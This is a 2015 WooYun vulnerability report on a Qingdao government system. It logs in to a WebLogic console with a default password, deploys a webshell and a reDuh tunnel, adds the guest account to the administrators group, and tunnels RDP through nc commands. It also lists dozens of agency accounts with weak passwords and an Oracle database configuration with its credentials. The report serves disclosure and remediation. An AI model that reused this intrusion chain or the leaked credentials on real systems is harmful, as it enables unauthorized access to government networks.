当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0142089

漏洞标题:青岛政务网某系统弱口令导致getshell(已登录远程桌面&数十个单位账号密码泄露)

相关厂商:cncert国家互联网应急中心

漏洞作者: 默之

提交时间:2015-09-21 09:52

修复时间:2015-11-06 20:18

公开时间:2015-11-06 20:18

漏洞类型:服务弱口令

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-21: 细节已通知厂商并且等待厂商处理中
2015-09-22: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-10-02: 细节向核心白帽子及相关领域专家公开
2015-10-12: 细节向普通白帽子公开
2015-10-22: 细节向实习白帽子公开
2015-11-06: 细节向公众公开

简要描述:

弱口令

详细说明:

http://**.**.**.**:10000/console/login/LoginForm.jsp
weblogic弱口令
system/password

界面.png


之后部署war包,总共部署了三个,不熟悉这个系统,用到了两个test和reduh
test中是一个大马

http://**.**.**.**:10000/test/da.jsp


不知道怎么回事,文件管理不能用,好在可以执行命令
好的administrator权限,试着激活guest用户,并加入管理员组

whoami.png


命令已经执行成功了

添加管理员.png


现在就用到了reduh包

http://**.**.**.**:10000/reduh/1.jsp


在reduh的控制端执行

java -jar reDuhClient.jar http://**.**.**.**:10000/reduh/1.jsp


接下来在nc中执行命令

nc -vv localhost 1010
[createTunnel]1234:**.**.**.**:3389


回到本机登陆**.**.**.**:1234

远程桌面.png


ipconfig.png


漏洞证明:

找到一个文件,包含数十个账号和密码,全是弱口令

单位	用户	密码	端口	位置
青岛人大	harborrd	password		e:/wwwdept/html-renda
青岛政协	harborzx	password		e:/wwwdept/html-zhengxie
绩效考核网	harborjxkh	password		e:/wwwdept/html-kaohe
青岛社科网	harborskw	password		e:/wwwdept/html-sky
市政府法制办	harborfzb	password		e:/wwwdept/html-fz
青岛政务督查	harborzwdc	password		e:/wwwdept/html-dc
青岛市保密局	harborbmj	password		e:/wwwdept/html-bmj
青岛市粮食局	harborlsj	password		e:/wwwdept/html-liangshi
青岛文联	harborwl	password		e:/wwwdept/html-wenlian
青岛城管执法局	harborcg	password		e:/wwwdept/html-chengguan
青岛市文化执法网	harborwhzf	password		e:/wwwdept/html-whzfj
青岛市海洋与渔业局	harborhyyy	password		e:/wwwdept/html-haiyang
青岛市机关事务管理局	harborjgswj	password		e:/wwwdept/html-jgswglj
青岛市城乡建设委员会	harborcxjw	password		e:/wwwdept/html-jw
青岛市防震减灾信息网	harborfzjz	password		e:/wwwdept/html-dzj
市政府网上审批服务大厅	harborspdt	password		e:/wwwdept/html-shenpidt
青岛市人民政府驻上海办事处	harborshb	password		e:/wwwdept/html-sh
青岛市国土资源执法监察支队	harborgt	password		e:/wwwdept/html-gtzd
青岛市人口和计划生育政务信息网	harborrkjsw	password		e:/wwwdept/html-rkjsw
青岛市建设工程材料管理办公室	harborjcb	password		e:/wwwdept/html-jcb
选调生之家	harborxds	password		e:/wwwdept/html-zzb
青岛团市委	harbortsw	password		e:/wwwdept/html-tsw
青岛市情网	harborsqw	password		e:/wwwdept/html-szb
即墨市情网	harborsqwjm	password		
城阳区情网	harborsqwcy	password		e:/wwwdept/html-cyqqw
李沧区情网	harborsqwlc	password		
崂山区情网	harborsqwls	password		e:/wwwdept/html-ssbls
市北区情网	harborsqwsb	password		
四方区情网	harborsqwsf	password		
黄岛区情网	harborsqwhd	password		
市南区情网	harborsqwsn	password		
平度市情网	harborsqwpd	password		
莱西市情网	harborsqwlx	password		e:/wwwdept/html-ssblx
胶南市情网	harborsqwjn	password		e:/wwwdept/html-jzszb
胶州市情网	harborsqwjz	password		
青岛外事网	harborwsw	password		e:/wwwdept/html-wb
统战部网站	harbortzb	password		e:/wwwdept/html-tzb
机关工委网站	harborjggw	password		e:/wwwdept/html-jgjs
青岛机构编制网	harborbb	password		e:/wwwdept/html-bb
青岛组工网网站	harborzgw	password		e:/wwwdept/html-zgw2
青岛市版权保护协会	harborbqxh	password		e:/wwwdept/html-bqxh
计生委科学技术研究所	harborjswyjs	password		
青岛市供销合作社联合社	harborgxs	password		e:/wwwdept/html-gxs
青岛市人民防空办公室	harborrfb	password		e:/wwwdept/html-rf
青岛金融	harborjwb	password		
日文版				e:/wwwdept/html-japanese
韩文版				e:/wwwdept/html-korean
英文版				e:/wwwdept/html-english
史志办市情网上通				e:/wwwdept/html-cct


数据库配置文件

<?xml version='1.0' encoding='UTF-8'?>
<!DOCTYPE hibernate-configuration PUBLIC
          "-//Hibernate/Hibernate Configuration DTD 3.0//EN"
          "http://**.**.**.**/hibernate-configuration-3.0.dtd">
<!-- Generated by MyEclipse Hibernate Tools.                   -->
<hibernate-configuration>
	<session-factory>
		<property name="dialect">
			org.hibernate.dialect.Oracle9iDialect
		</property>
		<property name="connection.url">
			jdbc:oracle:thin:@**.**.**.**:1521:oracmsdb1
		</property>
		<property name="connection.username">qdcmsdevor</property>
		<property name="connection.password">password</property>
		<property name="connection.driver_class">
			oracle.jdbc.driver.OracleDriver
		</property>
		<property name="current_session_context_class">thread</property>
		<property name="myeclipse.connection.profile">Oracle</property>
		<mapping resource="com/assoft/gips/db/xml/AAttribute.hbm.xml" />
		<mapping resource="com/assoft/gips/db/xml/AContent.hbm.xml" />
		<mapping resource="com/assoft/gips/db/xml/APartsText.hbm.xml" />
		<mapping resource="com/assoft/gips/db/xml/TNode.hbm.xml" />
		<mapping resource="com/assoft/gips/db/xml/TAttr.hbm.xml" />
	</session-factory>
</hibernate-configuration>

修复方案:

不要弱口令

版权声明:转载请注明来源 默之@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2015-09-22 20:17

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

最新状态:

暂无